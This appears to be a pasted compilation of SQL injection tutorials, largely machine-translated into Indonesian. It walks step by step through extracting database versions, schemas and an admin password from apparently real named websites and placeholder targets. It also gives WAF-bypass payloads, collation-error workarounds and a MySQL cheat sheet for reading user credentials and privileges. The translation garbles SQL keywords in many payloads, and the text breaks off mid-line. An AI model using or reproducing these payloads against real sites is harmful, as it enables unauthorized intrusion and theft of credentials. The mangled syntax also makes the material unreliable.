  1609. http://www.crookedtree.org/index.php?catid=583 pesanan oleh 2-- <== tidak ada kesalahan
  1610. http://www.crookedtree.org/index.php?catid=583 pesanan sebesar 3-- <== tidak ada kesalahan
  1611. http://www.crookedtree.org/index.php?catid=583 pesanan sebesar 4-- <== tidak ada kesalahan
  1612.  
  1613. Kami akan melakukan increament of 1 hingga mendapatkan kesalahan dan kami memiliki kesalahan pada kolom ke-14.
  1614.  
  1615. Itu berarti kita memiliki 13 kolom (error_column_num - 1) = 13.
  1616.  
  1617. Metode lain mengeksekusi query dengan union dan masuk ke kolom I.E
  1618.  
  1619. Kode:
  1620. http://www.crookedtree.org/index.php?catid=-583 union pilih null-- <== kesalahan
  1621. http://www.crookedtree.org/index.php?catid=-583 union pilih null, null-- <== kesalahan
  1622. http://www.crookedtree.org/index.php?catid=-583 union pilih null, null, null-- <== kesalahan
  1623.  
  1624. Kami akan terus menambahkan nol hingga kami mendapatkan halaman kosong atau situs yang dimuat. Metode ini benar-benar anoying Big Grin.
  1625.  
  1626.  
  1627. Langkah-4: Mendapatkan Data untuk Kolom Visble.
  1628.  
  1629. Istilah sebagian besar penggunaan ppl adalah kolom vuln. Sama seperti injeksi Oracle, kita akan menggunakan tipe data Null untuk kolom.
  1630.  
  1631. Pertanyaannya adalah mengapa ????? Karena kita tidak tahu tentang datatype sehingga menggunakan datatype null akan melakukan trik untuk kita.
  1632. dan tentu saja beberapa situs memang memiliki nilai interger sehingga akan digunakan sebagai sebaliknya.
  1633.  
  1634. Kode:
  1635. http://www.crookedtree.org/index.php?catid=-583 UNION PILIH null, null, null, null, null, null, null, null,
  1636. null, null, null, null, null--
  1637.  
  1638. Sekarang dapat melihat halaman dimuat dengan kesalahan keluar (beberapa waktu dimuat tetapi konten yang hilang seperti di situs ini).
  1639.  
  1640. Sekarang apa tapi tidak bisa melihat cetak coulmn di layar. Mari kita lanjutkan dengan nilai interger tetapi 0.
  1641.  
  1642. Kode:
  1643. http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0, null, null, null, null, null, null, null,
  1644. null, null, null, null, null-- <== tidak ada kesalahan
  1645. http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,0, null, null, null, null, null, null,
  1646. null, null, null, null, null-- <== tidak ada kesalahan
  1647. http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,0,0, null, null, null, null, null,
  1648. null, null, null, null, null-- <== kesalahan
  1649. http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,0, null, 0, null, null, null, null,
  1650. null, null, null, null, null-- <== kesalahan
  1651.  
  1652. Akan terus mengganti nol dengan nilai interget "0" sampai mendapat kesalahan. Wow kami memiliki kesalahan pada kolom ke-3 dan ke-4, ada kolom lain yang juga tetapi kami berhenti di sini dan pindah ke langkah berikutnya.
  1653.  
  1654. Ini yang kami cari.
  1655.  
  1656.  
  1657. Langkah-5: Mendapatkan Versi DB
  1658.  
  1659. Sekarang permintaan kami akan sama dengan nol kecuali kolom keempat, akan menggantikannya dengan versi.
  1660.  
  1661. Kode:
  1662. http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null, null, null, version (), null, null, null, null,
  1663. null, null, null, null, null--
  1664.  
  1665. PostgreSQL 8.2.9 pada x86_64-pc-linux-gnu, yang dikompilasi oleh GCC cc (GCC) 4.1.2 (Ubuntu 4.1.2-0ubuntu4)
  1666.  
  1667. Sekarang sudah mendapat versi db Big Grin.
  1668.  
  1669.  
  1670. Langkah-6: Mendapatkan DBz dan Tabel Skema lainnya
  1671.  
  1672. Saya akan memeriksa apakah target ini memiliki db lain atau tidak
  1673.  
  1674. Kode:
  1675. http://www.crookedtree.org/index.php?catid=-583 UNION PILIH null, null, null, datname, null, null, null, null,
  1676. null, null, null, null, null DARI pg_database--
  1677.  
  1678. AAA <== db
  1679.  
  1680. kita hanya melihat satu database pada satu waktu, Sekarang apa yang harus dilakukan hmmm bagaimana menggunakan batas untuk mendapatkan orang lain Big Grin.
  1681.  
  1682. Kode:
  1683. http://www.crookedtree.org/index.php?catid=-583 UNION PILIH null, null, null, datname, null, null, null,
  1684. null, null, null, null, null, null DARI pg_database LIMIT 1 OFFSET 1--
  1685.  
  1686. LIMIT 1 OFFSET 1 <== nilai OFFSET. Jika kita terus mengubah nilai ini maka kita akan mendapatkan db Big Grin berikutnya seperti 1 2 3 .....
  1687.  
  1688. Saya akan menjelaskan cara menggunakan db lain untuk injeksi di tutz lain. Sekarang kita akan pindah ke injeksi kami.
  1689.  
  1690. Langkah-6.1: Sekarang Memperoleh Tabel Skema.
  1691.  
  1692. Kode:
  1693. http://www.crookedtree.org/index.php?catid=-583 UNION PILIH null, null, null,
  1694. table_name, null, null, null, null, null, null, null, null, null DARI INFORMATION_SCHEMA.TABLES--
  1695.  
  1696. buku tambahan
  1697.  
  1698. Bad thing is cant concat hehehe aah jadi apa yang harus dilakukan sekarang. Kami harus menggunakan batas. Saya sudah jelaskan
  1699. bagaimana cara menggunakannya .
  1700.  
  1701. Kode:
  1702. http://www.crookedtree.org/index.php?catid=-583 UNION PILIH null, null, null,
  1703. table_name, null, null, null, null, null, null, null, null, null DARI INFORMATION_SCHEMA.TABLES batas 1 offset 3--
  1704.  
  1705. artist_entry
  1706.  
  1707. ATAU Tabel Dari Skema DB Saat Ini
  1708.  
  1709. Kode:
  1710. http://www.crookedtree.org/index.php?catid=-583 UNION PILIH null, null, null, table_name, null, null,
  1711. null, null, null, null, null, null, null DARI INFORMATION_SCHEMA.TABLES dimana table_schema = current_schema ()
  1712. limit 1 offset 0--
  1713.  
  1714. buku tambahan
  1715.  
  1716. Hanya
  1717.  
  1718. MS-ACCESS INJECTION TUTORIAL
  1719.  
  1720. Jadi kita akan memulai Penyuntikan Kita Secara Manual. Pertama kita harus memeriksa apakah situs Target kami Rentan. Jadi kita akan menggunakan Jenis Penginjeksian biasa dan menambahkan Single Quote 'di bagian akhir Parameter.
  1721.  
  1722. dan Jalankan URL
  1723.  
  1724. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 '
  1725. Di sini kami mendapat ERROR! !
  1726.  
  1727. KESALAHAN:
  1728. Kesalahan Microsoft JET Database Engine '80040e14'
  1729. Kesalahan sintaks dalam string dalam ekspresi query 'ID = 341' '.
  1730. /dettaglio-news.asp, baris 91
  1731. Jadi Target Kami Rentan. Sebelum Memulai Proses Lain terlebih dahulu, kami harus menyeimbangkan permintaan kami. Kami akan menggunakan Berbagai Komentar untuk menyeimbangkan Permintaan Kami.
  1732.  
  1733. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341--+ Kesalahan!
  1734.  
  1735. KESALAHAN: Kesalahan sintaks (operator tidak ada) dalam ekspresi kueri 'ID = 341--'.
  1736.  
  1737. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341-- Lagi Kesalahan !!
  1738.  
  1739. Sekarang, mari kita periksa null-byte ";% 00"
  1740. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341;% 00 Kesalahan Hilang !!
  1741. jadi akan melanjutkan Injecting Kami Dengan menggunakan Null-Byte di bagian akhir Parameter.
  1742.  
  1743. Sekarang kita harus menghitung Jumlah Kolom. Jadi Untuk Tujuan Ini kita akan menggunakan perintah ORDER BY Biasanya.
  1744. Mari Periksa Jumlah Kolom:
  1745. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 pesanan sebesar 1;% 00
  1746. Tidak Ada Kesalahan. Halaman Dimuat Secara Normal!
  1747.  
  1748. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 pesanan sebesar 5;% 00
  1749. Sekali lagi Tidak Ada Kesalahan!
  1750.  
  1751. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 pesanan sebesar 8;% 00
  1752. Lagi halaman Loaded Biasanya!
  1753.  
  1754. tetapi pada pesanan jam 9 kami sudah mendapat ERROR!
  1755. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 pesanan sebesar 9;% 00
  1756.  
  1757. KESALAHAN:
  1758. Kesalahan Microsoft JET Database Engine '80040e14'
  1759. Mesin database Microsoft Jet tidak mengenali '9' sebagai nama atau ekspresi lapangan yang valid.
  1760. /dettaglio-news.asp, baris 91
  1761. Jadi Ada 8 Kolom.
  1762. Sekarang Mari Siapkan perintah UNION BASED kami.
  1763. Setelah Melaksanakan Permintaan BERDASARKAN UNION Kami Punya KESALAHAN:
  1764. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8;% 00
  1765.  
  1766. KESALAHAN:
  1767. Kesalahan Microsoft JET Database Engine '80004005'
  1768. Input kueri harus berisi setidaknya satu tabel atau kueri.
  1769. /dettaglio-news.asp, baris 91
  1770. Di sini Comes The Main part.As jumlah kolom kami benar.jadi sepertinya Database adalah mysql 4.
  1771. Sekarang Kita Harus Menebak Tabel dan Kolom. Jadi Pertama-tama kita akan Tebak Tables.
  1772.  
  1773. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Pilih 1,2,3,4,5,6,7,8 dari Login;% 00
  1774. itu memberi kita ERROR!
  1775.  
  1776. KESALAHAN:
  1777. Kesalahan Microsoft JET Database Engine '80040e37'
  1778. Mesin database Microsoft Jet tidak dapat menemukan tabel input atau query 'login'. Pastikan itu ada dan namanya dieja dengan benar.
  1779. /dettaglio-news.asp, baris 91
  1780. itu artinya tabel ini tidak ada. Mari coba yang lain.
  1781. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Pilih 1,2,3,4,5,6,7,8 dari tabladmin;% 00
  1782. Masih Sama ERROR !!
  1783. Namun ketika kami mencoba Tabel ADMIN, Kesalahannya Sudah Hilang.
  1784. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Pilih 1,2,3,4,5,6,7,8 dari admin;% 00
  1785. Pada Tabel ADMIN, Kesalahan hilang dan kita dapat melihat Kolom yang Rentan di Halaman Web.
  1786.  
  1787. Anda dapat melihat 2,3,6 adalah Kolom yang Rentan. Jadi sekarang kita harus Tebak Kolom. Kita akan menempatkan kolom-kolom kita di Kolom-kolom yang Rentan.
  1788. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2, admin_id, 4,5,6,7,8 dari admin;% 00
  1789. Itu Memberi Kita Kesalahan!
  1790.  
  1791. itu Memberi kami Password = "bEx0Th6
  1792. Jadi kami akan melakukan hal yang sama untuk situs lain untuk disuntikkan ke dalam basis data.
  1793.  
  1794. MENGENAI SEMUA INJEKTOR: *
  1795.  
  1796.  
  1797. Menambahkan Tag HTML di Pertanyaan SQL - Tutorial oleh RAi Jee
  1798. Tag HTML dapat digunakan untuk banyak kesenangan dalam kueri SQL. Kita Dapat menggunakan Tag HTML untuk Membuat Hasil Penuh Warna di Output. Kadang-kadang kita menyuntikkan Situs dan Kolom yang Rentan ada di Judul atau di Halaman Sumber sehingga kita Juga Dapat Menggunakan Tag HTML Ada untuk Menunjukkan Output pada Halaman.
  1799. Jadi Kami Akan Mulai Menambahkan Tag HTML Untuk Membuat Output Beberapa Warna Penuh.
  1800. Berikut ini contohnya. Kami ingin Mencetak Versi dalam Warna MERAH Jadi Berikut adalah TAG HTML kami untuk Menampilkan Versi dalam Warna MERAH.
  1801. <font color = red>
  1802.  
  1803. Concat (OUR_HTML_TAG, QUERY_HERE)
  1804.  
  1805. mari Lihat Hasil. Sebelum Melaksanakan Query First Encode HTML TAG di Hex Value atau Use Single Quote Sebelum dan Sesudah Tag HTML Agar Dapat Dieksekusi
  1806.  
  1807. http://www.kimclement.com/basiccal/event.php
  1808. ? id = -444 'UNION SELECT 1,2,3,4,5,6, Concat (' <font color = red> ', versi ()), 8,9 - +
  1809.  
  1810. Dan Anda dapat Lihat Versi dalam warna MERAH. jika kita ingin menggunakan Warna yang Berbeda untuk Setiap Perintah Seperti Menampilkan Versi dalam Warna MERAH, Basis Data dalam Warna Hijau, Pengguna dalam Warna Biru sehingga akan menggunakan Tag HTML yang berbeda untuk setiap Tugas.
  1811. Lihat Contoh.
  1812. Concat (Versi Warna MERAH, Basis Data dalam Warna Hijau, Pengguna dengan Warna Biru)
  1813. Tag HTML Untuk Setiap Tugas:
  1814. Warna merah: <font color = red>
  1815. Warna Hijau: <font color = green>
  1816. Warna Biru: <font color = blue>
  1817. Jadi Pertanyaan Terakhir Kami Untuk Menampilkan Setiap tugas dalam warna yang berbeda Akan menjadi,
  1818. Concat (<font color = red>, versi (), <font color = green>, database (), <font color = blue>, pengguna ())
  1819. Lihat Contoh.
  1820. http://www.kimclement.com/basiccal/event.php
  1821. ? id = -444 'UNION SELECT 1,2,3,4,5,6, Concat (' <font color = red> ', versi (), 0x3a,' <font color = green> ', database (), 0x3a, '<font color = blue>', pengguna ()), 8,9 - +
  1822.  
  1823. Dan Lihat gambar semua Tugas Lengkap. Dengan cara ini Anda Juga Dapat Menampilkan Tabel dan Kolom dalam Warna yang berbeda.
  1824. Setelah Menampilkan Perintah SQLi dalam Berbagai Warna.
  1825. Sekarang, mari kita lihat bagaimana kita bisa menampilkan data ketika kolom rentan kita di halaman sumber atau di TiTLE menggunakan HTML TAGS.
  1826. Ketika Kolom Rentan ada di Halaman Sumber.
  1827. Concat (STARTING_HTML_TAG, OUR_QUERY, ENDING_HTML_TAG)
  1828. jadi kami akan menggunakan TAG HTML ini untuk Menampilkan Data pada Halaman jika Kolom Rawan Kami ada di halaman Sumber.
  1829.  
  1830. TAG HTML: Concat (<font size = "8" color = "red">, Versi (), </ font>)
  1831.  
  1832. dan kadang-kadang Kolom Rentan kami ada di Judul sehingga dalam hal ini kami akan menggunakan Tag HTML ini untuk Mencetak Data di Halaman Web
  1833.  
  1834. TAG HTML: Concat (</ title>, Version ())
  1835.  
  1836. gunakan Tag HTML ini setelah pengkodean dalam Hex Value atau PUT Single Quote sebelum dan sesudah Tag HTML untuk membuat Query Executable.
  1837.  
  1838. ©
  1839.  
  1840. When you try to access server with your SQL WAF will stop you again. You might have more luck if WAF controls only GET requests and you inject with POST.
  1841.  
  1842. SQLi Waf Behaviours
  1843.  
  1844. union select 1,2,3,4-- - [<---WAF
  1845.  
  1846. /*!union*/ select 1,2,3,4-- - [<--- No WAF
  1847.  
  1848. /*!union*/ select 1,group_concat(),3,4-- - [<--NO -WAF
  1849.  
  1850. /*!union*/ select 1,group_concat(table_name),3,4-- - [<---WAF
  1851.  
  1852. /*!union*/ select 1,group_concat(/*!table_name*/),3,4-- - [<--- No WAF
  1853.  
  1854. /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from -- - [<---No WAF
  1855.  
  1856. /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables-- - [<---No WAF
  1857.  
  1858. /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables where-- - [<---WAF
  1859.  
  1860. /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/-- - [<---No WAF
  1861.  
  1862. /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/ table_schema-- - [<---No WAF
  1863.  
  1864. /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/ table_schema=database()-- - [<---No WAF
  1865.  
  1866. -h
  1867.  
  1868. Tools of Online Crytography
  1869.  
  1870. HEADER AND POST DATA SQLI AND LOOKING DEEP INTO VULNERABLE SUCH AS XSS
  1871. https://www.hurl.it/
  1872. http://requestmaker.com/
  1873. http://headers.cloxy.net/
  1874. http://www.rexswain.com/
  1875.  
  1876. http://www.cryptool-online.org/index.php?option=com_cto&view=tool&Itemid=139&lang=en
  1877. Base 64
  1878. enigmaco
  1879. http://www.swingnote.com/tools/texttohex.php
  1880. http://des.online-domain-tools.com/
  1881.  
  1882. http://www.verexif.com/en/
  1883. http://www.extractmetadata.com/
  1884. http://metapicz.com/#landing
  1885.  
  1886. https://www.google.co.kr/search?biw=1280&bih=617&q=cryptography+converter+online&oq=Cryptography+convert&gs_l=serp.1.1.0j0i22i30.2581.5076.0.7002.13.13.0.0.0.0.143.1345.5j8.13.0....0...1c.1.64.serp..0.13.1344.BK2uvc9iKTo
  1887.  
  1888. Gematria Primus count: http://codeseekah.com/cicada/count.html
  1889. http://www.unit-conversion.info/texttools/hexadecimal/
  1890. XOR: http://md5decrypt.net/en/Xor/
  1891. http://www.braingle.com/brainteasers/codes/index.php
  1892. ASCII HEX DEC BIN converter: http://home.paulschou.net/tools/xlate/
  1893.  
  1894. ASCI HEX DEC OCTAL converter: http://redir.dasumo.com/hex/
  1895.  
  1896. Steganography software: http://www.jjtc.com/Steganography/tools.html
  1897. https://www.base64-image.de/
  1898. http://b64.io/
  1899. https://xcode.darkbyte.ru/
  1900. http://manytools.org/hacker-tools/steganography-encode-text-into-image/
  1901. http://decodebase64.com/
  1902. https://convertio.co/txt-jpg/
  1903. Anagram solver: http://www.ssynth.co.uk/~gay/anagram.html
  1904.  
  1905. Rumkin old ciphers: http://rumkin.com/tools/cipher/index.php
  1906. PGP https://www.igolder.com/pgp/encryption/
  1907. http://www.hanewin.net/encrypt/PGdecode.htm
  1908. Exif:
  1909. http://www.garykessler.net/library/fsc_stego.html
  1910. AES, Salsa20, and Twofish
  1911. http://www.gematrix.org/
  1912. https://infotomb.com/m/welcome
  1913. http://morsecode.scphillips.com/translator.html
  1914. http://www.online-toolz.com/tools/text-encryption-decryption.php
  1915. http://www.unit-conversion.info/texttools/morse-code/
  1916. https://futureboy.us/stegano/
  1917.  
  1918. -h
  1919.  
  1920. BYPASSING ERROR
  1921.  
  1922. Hmmm kita akan mulai dengan Injecting normal kami. Kami menemukan situs dari Google saat menyuntik dan rentan terhadap injeksi SQL.
  1923. Pertama kita akan menghitung jumlah total kolom.
  1924.  
  1925. http://www.TARGET.com/product.php?id=35 pesanan sebesar 5-- -
  1926.  
  1927. Tidak Ada Kesalahan!
  1928.  
  1929. http://www.TARGET.com/product.php?id=35 pesanan sebesar 6-- -
  1930.  
  1931. Sekali lagi Situs dimuat Biasanya dan Tidak Ada Kesalahan!
  1932.  
  1933. http://www.TARGET.com/product.php?id=35 pesanan sebesar 7-- -
  1934.  
  1935. Sekarang Kita Punya Kesalahan di sini
  1936.  
  1937. Kolom tidak dikenal '7' di 'pesanan klausa'
  1938.  
  1939. Berarti Ada Total 6 Jumlah Kolom.
  1940.  
  1941. Memungkinkan Jalankan UNION BASED Query kami.
  1942.  
  1943. http://www.TARGET.com/product.php?id=35 dan 0 Union SELECT 1,2,3,4,5,6-- -
  1944.  
  1945. Setelah mengeksekusi UNION BASED Query, kami Punya Kesalahan.
  1946.  
  1947. Kesalahan fatal: Ukuran memori yang diizinkan sebesar 536870912 byte habis (mencoba mengalokasikan 534511572 byte) di /home/XXXX/public_html/cat_ver_producto.php pada baris 166
  1948.  
  1949. Masalahnya adalah dengan Memori PHP Server. Kami Akan menggunakan Nilai NULL daripada menempatkan Kolom Nomor di sana untuk Memotong Server Penggunaan Memori PHP untuk Query SQL kami.
  1950.  
  1951. Setelah Menempatkan nilai NULL, Kueri Kita Akan Jadi.
  1952. http://www.TARGET.com/product.php?id=35 dan 0 Union SELECT null, null, null, null, null, null-- -
  1953.  
  1954. Sekarang ERROR GONE !!
  1955.  
  1956. Karena kami menggunakan Null Values, kami tidak tahu Kolom mana yang Rentan. Jadi untuk menemukan Kolom yang Rentan, Kita Berikan Perintah Versi () satu per satu di setiap Kolom sampai Memberi Kita Hasil Apapun.
  1957.  
  1958. http://www.TARGET.com/product.php?id=35 dan 0 versi PILIH Union (), null, null, null, null, null-- -
  1959.  
  1960. Setelah mengecek Kolom pertama selanjutnya Periksa Yang Lain dan kemudian Lain lagi sampai kami Mendapat Hasilnya. Dengan Cara Ini kami Akan Memeriksa Semua Kolom dan Akan Menemukan Kolom Yang Rentan.
  1961.  
  1962. Ketika kami akan menemukan Kolom yang Rentan kami, maka kami dapat menempatkan Permintaan kami untuk Tabel dan Kolom di Kolom yang rentan itu.
  1963. jika Anda Tidak Tahu Bagaimana Mendapatkan Tabel Dan Kolom Kemudian.
  1964.  
  1965. -h
  1966.  
  1967.  
  1968. Memotong Mix of Collations yang ilegal - Tutorial
  1969. Dengan suntik pikiran
  1970. Hanya 4 no0b seperti saya
  1971. Dalam Tutorial ini Anda Akan Mempelajari Cara Melepaskan Campuran Kolasi ilegal.
  1972. Mari kita mulai dengan injeksi SQL Reguler kami.
  1973. Target kami.
  1974. http://www.Site.com/detail.php?id=31
  1975. Pertama kita harus Hitung Berapa Banyak Kolom yang dimilikinya.
  1976. http://www.Site.com/detail.php?id=31 pesanan oleh 1-- -
  1977. Tidak Ada Kesalahan!
  1978. http://www.Site.com/detail.php?id=31 pesanan oleh 4-- -
  1979. Tidak Ada Kesalahan!
  1980. http://www.Site.com/detail.php?id=31 pesanan sebesar 6-- -
  1981. Kami Punya Kesalahan Di Sini.
  1982. Kolom Tidak Diketahui '6' di 'pesanan oleh'
  1983. Memungkinkan Mengurangi Jumlah Kolom.
  1984. http://www.Site.com/detail.php?id=31 pesanan sebesar 5-- -
  1985. Tidak Ada Kesalahan!
  1986. Ada 5 Kolom jadi ayo Siapkan UNION SELECT Command dan Cari Kolom yang Rentan.
  1987. http://www.Site.com/detail.php?id=31 dan 0 Union Select 1,2,3,4,5-- -
  1988. Kami Punya 2 dan 3.
  1989. Mari mencoba untuk Dapatkan The Tables.
  1990. http://www.Site.com/detail.php?id=31 dan 0 Union Select 1, concat (table_name), 3,4,5 dari information_schema.tables di mana table_schema = database () - -
  1991. Ooops !! kami mendapat Kesalahan Di Sini.
  1992. Campuran ilegal dari kolasi untuk operasi 'UNION'
  1993. Berikut Beberapa Metode yang dapat kita gunakan untuk Melewatkan campuran ilegal dari pengumpulan untuk operasi 'UNION'
  1994. .1 Menggunakan UNCOMPRESS (COMPRESS (our_query_here))
  1995. http://www.Site.com/detail.php?id=31 dan 0 Union Select 1, uncompress (kompres (concat (table_name))), 3,4,5 dari information_schema.tables di mana table_schema = database () - - -
  1996. DIKECEPATAN !!
  1997. .2 Menggunakan UNHEX (HEX (our_query_here))
  1998. http://www.Site.com/detail.php?id=31 dan 0 Union Select 1, unhex (hex (concat (table_name))), 3,4,5 dari information_schema.tables di mana table_schema = database () - - -
  1999. DIKECEPATAN !!
  2000. .3 Menggunakan CAST ()
  2001. http://www.Site.com/detail.php?id=31 dan 0 Union Select 1, cast (table_name sebagai binary), 3,4,5 dari information_schema.tables di mana table_schema = database () - -
  2002. DIKECEPATAN !!
  2003. .4 Menggunakan CONVERT ()
  2004. http://www.Site.com/detail.php?id=31 dan 0 Union Select 1, konversikan (table_name menggunakan ascii), 3,4,5 dari information_schema.tables di mana table_schema = database () - -
  2005. DIKECEPATAN !!
  2006. BEBERAPA METODE ADVANCE untuk CONVERT ()
  2007. Dalam CONVERT () Fungsi jika ascii tidak berfungsi maka kita dapat menggunakan Fungsi ini sebagai ganti ascii.
  2008. ujis
  2009. ucs2
  2010. tis620
  2011. swe7
  2012. sjis
  2013. macroman
  2014. macce
  2015. latin7
  2016. latin5
  2017. latin2
  2018. koi8u
  2019. koi8r
  2020. keybcs2
  2021. hp8
  2022. geostd8
  2023. gbk
  2024. gb2132
  2025. armscii8
  2026. ascii
  2027. cp1250
  2028. big5
  2029. cp1251
  2030. cp1256
  2031. cp1257
  2032. cp850
  2033. cp852
  2034. cp866
  2035. cp932
  2036. dec8
  2037. euckr
  2038. latin1
  2039. Semoga ini akan membantu Anda di masa depan
  2040.  
  2041. Terima kasih untuk saudara tutorialnya: *
  2042.  
  2043. -h
  2044.  
  2045.  
  2046. filtered Requested
  2047. # tables #
  2048. group_concat(/*!table_name*/)
  2049. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– -
  2050.  
  2051. or
  2052.  
  2053. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– -
  2054.  
  2055. or
  2056.  
  2057. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()– -
  2058.  
  2059. Union Select bypass
  2060.  
  2061. &id=10 %26%26 NULL union/**/DistinctRow select 1,2-- -
  2062. &id=@ Or 1<0 union/**/DistinctRow select 1,2-- -
  2063. &id=@<0union/**/DistinctRow select 1,2-- -
  2064.  
  2065. QUERY RESUME ? :D
  2066. Version:
  2067. SELECT VERSION()
  2068. SELECT @@version
  2069. SELECT @@version_comment
  2070. SELECT @@version_compile_machine
  2071. SELECT @@version_compile_os
  2072. Directories:
  2073. SELECT @@basedir
  2074. SELECT @@tmpdir
  2075. SELECT @@datadir
  2076. Users:
  2077. SELECT USER()
  2078. SELECT SYSTEM_USER()
  2079. SELECT SESSION_USER()
  2080. SELECT CURRENT_USER()
  2081. Current Database:
  2082. SELECT DATABASE()
  2083. Concatenation:
  2084. SELECT CONCAT('foo','.','bar'); #Returns: foo.bar
  2085. SELECT CONCAT_WS(' ','Hello','MySQL','and','hello','world!'); #Retu
  2086. Multi-Concat:
  2087. #Stacks the row "foo" from the table "bar" together, using the separa
  2088. #Note: This operation can by default only grab 1024 bytes, and do no
  2089. #The 1024 byte limit is stored in the @@group_concat_max_len variabl
  2090. SELECT GROUP_CONCAT(foo SEPARATOR '<br />') FROM bar
  2091. Better-Concat:
  2092. #CONCAT() and CONCAT_WS() do not have the same restriction(s) as GROU
  2093. #Which therefor allows you to concat strings together up to the @@ma
  2094. #instead of @@group_concat_max_len. The default value for @@max_allo
  2095. #1048576 bytes, instead of @@group_concat_max_len's 1024.
  2096. SELECT (CONCAT_WS(0x3A,(SELECT CONCAT_WS(0x2E,table_schema,table_name
  2097. Change Collation:
  2098. SELECT CONVERT('test' USING latin1); #Converts "test" to latin1 from
  2099. SELECT CONVERT('rawr' USING utf8); #Converts "rawr" to utf8.
  2100. Wildcards in SELECT(s):
  2101. SELECT foo FROM bar WHERE id LIKE 'test%'; #Returns all COLUMN(s) st
  2102. SELECT foo FROM bar WHERE id LIKE '%test'; #Returns all COLUMN(s) en
  2103. Regular Expression in SELECT(s):
  2104. #Returns all columns matching the regular expression.
  2105. SELECT foo FROM bar WHERE id RLIKE '(moo|rawr).*'
  2106. SELECT Without Dublicates:
  2107. SELECT DISTINCT foo FROM bar
  2108. Counting Columns:
  2109. SELECT COUNT(foo) FROM bar; #Returns the amount of rows "foo" from t
  2110. Get Amount of MySQL Users:
  2111. SELECT COUNT(user) FROM mysql.user
  2112. Get MySQL Users:
  2113. SELECT user FROM mysql.user
  2114. Get MySQL User Privileges:
  2115. SELECT grantee,privilege_type,is_grantable FROM information_schema.us
  2116. Get MySQL User Privileges on Different Databases:
  2117. SELECT grantee,table_schema,privilege_type FROM information_schema.sc
  2118. Get MySQL User Privileges on Different Columns:
  2119. SELECT table_schema,table_name,column_name,privilege_type FROM infor
  2120. Get MySQL User Credentials & Privileges:
  2121. SELECT CONCAT_WS(0x2E,host,user,password,Select_priv,Insert_priv,Upd
  2122. Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,
  2123. File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_p
  2124. Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_
  2125. Repl_client_priv) FROM mysql.user
  2126. Get MySQL DBA Accounts:
  2127. SELECT grantee,privilege_type,is_grantable FROM information_schema.us
  2128. SELECT host,user FROM mysql.user WHERE Super_priv='Y'
  2129. Get Databases:
  2130. SELECT schema_name FROM information_schema.schemata
  2131. SELECT DISTINCT db FROM mysql.db
  2132. SELECT DISTINCT table_schema FROM information_schema.columns
  2133. SELECT DISTINCT table_schema FROM information_schema.tables
  2134. Get Databases & Tables:
  2135. SELECT table_schema,table_name FROM information_schema.tables
  2136. SELECT DISTINCT table_schema,table_name FROM information_schema.colu
  2137. Get Databases, Tables & Columns:
  2138. SELECT table_schema,table_name,column_name FROM information_schema.c
  2139. SELECT A Certain Row:
  2140. SELECT foo FROM bar LIMIT 0,1; #Returns row 0.
  2141. SELECT foo FROM bar LIMIT 1,1; #Returns row 1.
  2142. ...
  2143. SELECT foo FROM bar LIMIT N,1; #Returns row N.
  2144. Benchmark (Heavy Query):
  2145. #Performs an MD5 calculation of "1" for 10000 times.
  2146. SELECT BENCHMARK(10000,MD5(1))
  2147. Sleep:
  2148. #Works only in MySQL 5 and above.
  2149. #Sleeps for 5 seconds, returns 0 on success.
  2150. SELECT SLEEP(5)
  2151. Conversion (Casting):
  2152. SELECT CAST('1' AS UNSIGNED INTEGER); #Returns: 1
  2153. SELECT CAST('65' AS CHAR); #Returns: A
  2154. Substring:
  2155. SELECT SUBSTR('foobar',1,3); #Returns: foo
  2156. Hexadecimal Evasion:
  2157. SELECT 0x41424344; #Returns: ABCD
  2158. SELECT 0x2E; #Returns: .
  2159. SELECT 0x3A; #Returns: :
  2160. ASCII to Number:
  2161. SELECT ASCII('A'); #Returns: 65
  2162. Number to ASCII:
  2163. SELECT CHAR(65); #Returns: A
  2164. SELECT CHAR(89); #Returns: Y
  2165. SELECT CHAR(116,101,115,116); #Returns: test
  2166. If Statement:
  2167. #Returns 1 if the database is running MySQL 5.
  2168. SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0);
  2169. #Returns 1 if the database is running MySQL 4.
  2170. SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0);
  2171. Case Statement:
  2172. #Returns 1 if the database is running MySQL 5.
  2173. SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=53) THEN 1 ELSE 0 END
  2174. #Returns 1 if the database is running MySQL 4.
  2175. SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=52) THEN 1 ELSE 0 END
  2176. Read File(s):
  2177. #Requires you to have the File_priv in mysql.user. On error this stat
